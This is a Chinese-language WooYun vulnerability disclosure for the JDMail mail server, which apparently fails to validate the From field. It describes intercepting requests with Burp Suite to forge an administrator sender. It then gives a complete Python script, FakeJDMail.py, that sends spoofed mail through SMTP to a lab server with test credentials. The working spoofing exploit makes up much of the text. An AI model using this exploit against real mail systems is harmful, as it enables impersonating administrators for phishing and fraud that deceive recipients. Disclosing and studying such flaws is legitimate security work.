WooYun.org

本地搭建邮件服务器进行测试，源码下载链接：http://www.mailer.com.cn/download2.html
ps:)利用代码FakeJDMail.py在后面
漏洞利用方法:
1)使用[email protected]向[email protected]发送一封邮件：

2)使用bursuite拦截HTTP数据包

其中From字段的值为：client1+%3Cclient1%40test.com%3E 即client1<[email protected]>
由于JDMail邮件服务器未对From字段进行验证，通过修改From字段的值就可以达到邮件欺骗攻击。
3)使用BurpSuite将From字段的值修改为管理员邮箱地址:admin+%3Cadmin%40test.com%3E

4)登录client2邮箱账户进行接收邮件，可以发现有一封来自管理员[email protected]的邮件

利用代码：
这里给出一段利用代码，修改代码中的frm变量即可伪造发件人进行邮件欺骗
FakeJDMail.py
-------------------------------
#!/user/bin/python
import smtplib
import datetime
MailTemplate= '''From: {From}\nTo: {To}\nSubject: {Subject}\nDate: {Date}\nContent-type:{ContentType}\n\n{Msg}\r\n\r\n'''
def SendJDMail(Server,Username,Password,Sender,Reciever,MailMsg):
try:
SmtpObj = smtplib.SMTP(Server)
SmtpObj.login(Username, Password)
print 'Sending Email'
SmtpObj.sendmail(Sender, Reciever,MailMsg)
except Exception:
print "Error: unable to sendemail"
return False
print "Successfully sent email"
SmtpObj.quit()
if __name__ == '__main__':
server = '192.168.43.132'
domain = '@test.com'
username = 'client1'
password = '123456'
sender = username
reciever = 'client2'
subject = 'fake sender'
date =datetime.datetime.now().strftime("%a, %d %b %Y %H:%M:%S +0800")
msg = 'begin to attack!'
frm= 'admin' + '<' + 'admin'+domain+'>' #fake sender
to = reciever + '<' +reciever+domain+'>'
mailmsg =MailTemplate.format(From=frm,To=to,Subject=subject,Date=date,ContentType='text/html',Msg=msg)
SendJDMail(server, username+domain,password,sender+domain,reciever+domain,mailmsg)
---------------------------------------